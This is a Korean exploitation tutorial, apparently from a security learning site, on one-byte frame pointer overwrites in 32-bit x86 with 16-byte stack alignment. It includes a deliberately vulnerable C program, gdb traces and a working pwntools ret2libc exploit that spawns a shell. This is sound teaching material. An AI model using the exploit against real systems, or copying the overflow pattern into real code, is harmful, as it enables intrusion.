...
Excuse the ads! We need some help to keep our site up.
List
Frame Pointer Overwrite(One-byte Overflow) - x86
x86에서도 x64 환경과 같이 Frame Pointer를 1byte 덮어써서 코드의 흐름을 변경 할 수 있습니다.
32 bit Binary의 경우 64bit와 달리 스택을 16 바이트 경계에 정렬하는 코드가 추가됩니다.
x86-64 ABI는 16 바이트 스택 정렬이 필요합니다.
ABI와 호환되지 않는 환경에서 스택 공간을 제한해서 사용하기 위해서 입니다.
펜티엄 III에서 SSE(Streaming SIMD Extension) 데이터 유형 __m128이 16 바이트 정렬되지 않으면 올바르게 작동하지 않을 수 있습니다.
Stack alignment at 16-byte boundary
- 다음과 같이 16byte 경계에 스택을 정렬하기 위한 코드는 다음과 같이 동작합니다.
- main() 함수가 시작 되는 부분에서는 이전 함수에서 사용하던 Frame Pointer를 Stack에 저장하기 전에 Stack alignment을 진행합니다.
- main() 함수가 종료 되는 부분에서는 다음과 같이 동작 합니다.
- leave 명령어 실행 전, ebp 레지스터에 저장 된 주소에 0x4를 뺀 영역에 저장된 값을 ecx 레지스터에 저장됩니다.
- leave 명령어 실행 후, ecx 레지스터에 저장 된 주소에 0x4를 뺀 주소 값을 esp 레지스터에 저장됩니다.
- 여기가 중요합니다.
- Stack alignment 코드가 없을 경우에는 esp 레지스터의 값이 leave 코드에 의해 변경됩니다.
- Stack alignment 코드 적용되면 ret 코드가 실행되기 전에 "lea esp,[ecx-0x4]" 코드에 의해 esp 레지스터의 값이 변경됩니다.
- 하지만 ecx레지스터의 값은 leave 코드가 실행 되기전에 ebp 레지스터를 이용해 값을 저장하기 때문에 esp 레지스터의 값을 변경 할 수 있습니다.
| Panel |
|---|
| title | Stack alignment at 16-byte, 4-byte boundary |
|---|
|
| Stack alignment(16byte) | Stack alignment(4byte) |
|---|
| main() | | Code Block |
|---|
>> 0x080485d3 <+0>: lea ecx,[esp+0x4]
>> 0x080485d7 <+4>: and esp,0xfffffff0
>> 0x080485da <+7>: push DWORD PTR [ecx-0x4]
0x080485dd <+10>: push ebp
0x080485de <+11>: mov ebp,esp
0x080485e0 <+13>: push ecx
0x080485e1 <+14>: sub esp,0x4
0x080485e4 <+17>: mov eax,ecx
0x080485e6 <+19>: cmp DWORD PTR [eax],0x1
0x080485e9 <+22>: jg 0x8048605 <main+50>
0x080485eb <+24>: sub esp,0xc
0x080485ee <+27>: push 0x80486d4
0x080485f3 <+32>: call 0x8048430 <puts@plt>
0x080485f8 <+37>: add esp,0x10
0x080485fb <+40>: sub esp,0xc
0x080485fe <+43>: push 0x0
0x08048600 <+45>: call 0x8048440 <exit@plt>
0x08048605 <+50>: call 0x804857b <vuln>
0x0804860a <+55>: nop
>> 0x0804860b <+56>: mov ecx,DWORD PTR [ebp-0x4]
0x0804860e <+59>: leave
>> 0x0804860f <+60>: lea esp,[ecx-0x4]
0x08048612 <+63>: ret |
| | Code Block |
|---|
0x080485c7 <+0>: push ebp
0x080485c8 <+1>: mov ebp,esp
0x080485ca <+3>: cmp DWORD PTR [ebp+0x8],0x1
0x080485ce <+7>: jg 0x80485e4 <main+29>
0x080485d0 <+9>: push 0x80486a4
0x080485d5 <+14>: call 0x8048430 <puts@plt>
0x080485da <+19>: add esp,0x4
0x080485dd <+22>: push 0x0
0x080485df <+24>: call 0x8048440 <exit@plt>
0x080485e4 <+29>: call 0x804857b <vuln>
0x080485e9 <+34>: nop
0x080485ea <+35>: leave
0x080485eb <+36>: ret |
|
|---|
|
Proof of concept
Example code
- 다음 코드를 이용하여 Frame Pointer Overwrite의 동작을 확인하겠습니다.
- 해당 프로그램은 Stack address, Libc address를 출력합니다.
- Stack address: buf
- Libc address: printf_addr
- read()함수를 이용해 사용자로 부터 63개의 문자를 입력 받습니다.
- 이로 인해 Frame pointer영역에 1byte를 Overwrite 할 수 있습니다.
| Code Block |
|---|
|
//gcc 4.8.4 Version
//gcc -m32 -fno-stack-protector -o fpo fpo_alignment.c -ldl
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
void vuln(){
char buf[50];
printf("buf[50] address : %p\n",buf);
void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
printf("Printf() address : %p\n",printf_addr);
read(0, buf, 63);
}
void main(int argc, char *argv[]){
if(argc<2){
printf("argv error\n");
exit(0);
}
vuln();
} |
Stack alignment
- 다음과 같이 Break pointer를 설정합니다.
- 0x080485d3: main() 함수의 Stack alignment를 위한 코드가 실행 되기 전
...
| Code Block |
|---|
| title | Stack alignment at 16-byte boundary |
|---|
|
gdb-peda$ r AAAA
Starting program: /home/lazenca0x0/Exploit/FPO/fpo_aligned AAAA
Breakpoint 1, 0x080485d3 in main ()
gdb-peda$ i r esp
esp 0xffffd59c 0xffffd59c
gdb-peda$ p/x 0xffffd59c + 0x4
$1 = 0xffffd5a0
gdb-peda$ ni
0x080485d7 in main ()
gdb-peda$ i r esp
esp 0xffffd59c 0xffffd59c
gdb-peda$ p/x 0xffffd59c & 0xfffffff0
$2 = 0xffffd590
gdb-peda$ ni
0x080485da in main ()
gdb-peda$ i r esp
esp 0xffffd590 0xffffd590
gdb-peda$ i r ecx
ecx 0xffffd5a0 0xffffd5a0
gdb-peda$ x/wx 0xffffd5a0 - 0x4
0xffffd59c: 0xf7e18637
gdb-peda$ x/i 0xf7e18637
0xf7e18637 <__libc_start_main+247>: add esp,0x10
gdb-peda$ |
Change the flow of code
- 다음과 같이 Break pointer를 설정합니다.
- 0x0804857e: vuln() 함수에서 사용 할 Fream Pointer를 EBP 레지스터에 저장한 후
- 0x080485d1: vuln() 함수에서 leave 명령어 호출
- 0x0804860b: main() 함수의 "movecx,DWORD PTR [ebp-0x4]" 코드
...
| Code Block |
|---|
| title | Change the flow of code |
|---|
|
gdb-peda$ c
Continuing.
Breakpoint 4, 0x0804860b in main ()
gdb-peda$ i r ebp
ebp 0xffffd550 0xffffd550
gdb-peda$ x/wx 0xffffd550 - 0x4
0xffffd54c: 0x46464545
gdb-peda$ ni
0x0804860e in main ()
gdb-peda$ i r ecx
ecx 0x46464545 0x46464545
gdb-peda$ c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
Stopped reason: SIGSEGV
0x08048612 in main ()
gdb-peda$ i r esp
esp 0x46464541 0x46464541
gdb-peda$ |
Exploit
| Code Block |
|---|
| language | py |
|---|
| title | Exploit.py |
|---|
|
from pwn import *
p = process(['./fpo_aligned','AAAA'])
p.recvuntil('buf[50] address : ')
tmp = p.recv(10)
stackAddr = int(tmp,16)
stackAddr += 0x8
onebyte = int(tmp[8:11],16)
onebyte += 0x4
p.recvuntil('Printf() address : ')
libc = p.recvuntil('\n')
libc = int(libc,16)
libcBase = libc - 0x49020
sysAddr = libcBase + 0x3a940
exit = libcBase + 0x2e7b0
binsh = libcBase + 0x15902b
print "StackAddr : " + hex(stackAddr)
print "onebyte : " + hex(onebyte)
print "libc base : " + hex(libcBase)
print "system() : " +hex(sysAddr)
print "exit() : " +hex(exit)
print "binsh : " + hex(binsh)
exploit = p32(stackAddr)
exploit += p32(sysAddr)
exploit += p32(exit)
exploit += p32(binsh)
exploit += '\x90' * (62 - len(exploit))
exploit += p32(onebyte)
p.send(exploit)
p.interactive() |
| Code Block |
|---|
|
lazenca0x0@ubuntu:~/Exploit/FPO$ python Exploit.py
[+] Starting local process './fpo_aligned': pid 4830
StackAddr : 0xffc98542
onebyte : 0x3e
libc base : 0xf7d8d000
system() : 0xf7dc7940
exit() : 0xf7dbb7b0
binsh : 0xf7ee602b
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ |
...